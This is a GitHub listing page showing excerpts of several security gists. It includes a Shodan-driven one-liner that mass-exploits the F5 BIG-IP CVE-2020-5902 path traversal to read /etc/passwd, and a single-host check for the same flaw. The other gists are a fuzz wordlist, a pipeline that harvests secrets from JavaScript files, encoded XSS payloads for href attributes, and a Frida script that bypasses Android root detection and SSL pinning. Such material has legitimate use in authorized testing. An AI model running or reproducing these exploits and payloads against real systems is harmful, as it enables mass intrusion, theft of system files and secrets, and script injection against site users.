Skip to content

Instantly share code, notes, and snippets.

View secfb's full-sized avatar

Never Mind secfb

75 followers · 495 following
View GitHub Profile
@Mad-robot
Mad-robot / rce.sh
Last active January 7, 2024 01:54
Shodan Big Ip RCE
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
#sudo apt install curl
#sudo apt install python3-shodan
#shodan init YOUR_API_KEY
@ykoster
ykoster / cve-2020-5902-check.sh
Last active July 8, 2020 10:02
Bash one-liner to check if a device is vulnerable for CVE-2020-5902
curl --silent --insecure 'https://[ip]/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=Vulnerable' | \
grep -q Vulnerable && \
printf '\033[0;31mVulnerable\n' || \
printf '\033[0;32mNot Vulnerable\n'
@LuD1161
LuD1161 / shodan_api_query.py
Created July 4, 2020 12:54
Query Shodan API : Plain and Simple
# -*- coding: utf-8 -*-
import requests
import time
import os
import json
import sys
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
@m4ll0k
m4ll0k / fuzz.txt
Last active June 23, 2023 05:43
fuzz wordlist
undefined
undef
null
NULL
(null)
nil
NIL
true
false
True
@vsec7
vsec7 / BurpSuiteSSLPassTrough.json
Created June 25, 2020 11:43
Filter out the noise
{
"proxy":{
"ssl_pass_through":{
"automatically_add_entries_on_client_ssl_negotiation_failure":false,
"rules":[
{
"enabled":true,
"host":".*\\.google\\.com",
"protocol":"any"
},
@m4ll0k
m4ll0k / gist:c33c3bac057584642c8a63144888e3d1
Created June 22, 2020 13:16
# replace $mytarget with your target
gau $mytarget|egrep -iv '\.json'|grep -iE '\.js'|antiburl|awk '{print $4}' | xargs -I %% bash -c 'python3 SecretFinder.py -i %% -o cli'
# use -r option for extract anything
gau $mytarget|egrep -iv '\.json'|grep -iE '\.js'|antiburl|awk '{print $4}' | xargs -I %% bash -c 'python3 SecretFinder.py -i %% -o cli -r "$anything"'
@securifera
securifera / Filename extension list
Created June 21, 2020 00:31
.php
.html
.txt
.htm
.aspx
.asp
.js
.css
.pgsql.txt
.mysql.txt
@gh0sh
gh0sh / gf-and-gau-automate.sh
Last active November 30, 2022 10:02
Simple script to look for juicy endpoints with gf and gau
#!/usr/bin/env bash
#
# Requirements
# - Golang (for complete bug bounty tools, clone this https://github.com/x1mdev/ReconPi)
# - gau (go get -u github.com/lc/gau)
# - gf (go get -u github.com/tomnomnom/gf)
# - Gf-Patterns (https://github.com/1ndianl33t/Gf-Patterns) - Read the README.md for how to copy json file to ~/.gf/
cd ~/.gf
ls *.json > ~/patterns
@hackerscrolls
hackerscrolls / href_bypass.html
Last active February 17, 2024 16:48
XSS payloads for href
<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()
<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)
@rootsec1
rootsec1 / fridascript.js
Last active March 25, 2024 07:26
Bypass SSL certificate pinning and evade root detection on Android (Frida script)
Java.perform(function () {
console.log("\nRoot detection bypass with Frida");
var CommonUtils = Java.use("io.fabric.sdk.android.services.common.CommonUtils");
console.log("\nHijacking isRooted function in CommonUtils class");
CommonUtils.isRooted.implementation = function () {
console.log("\nInside the isRooted function");
return false;
};
console.log("\nRoot detection bypassed");
console.log("\n");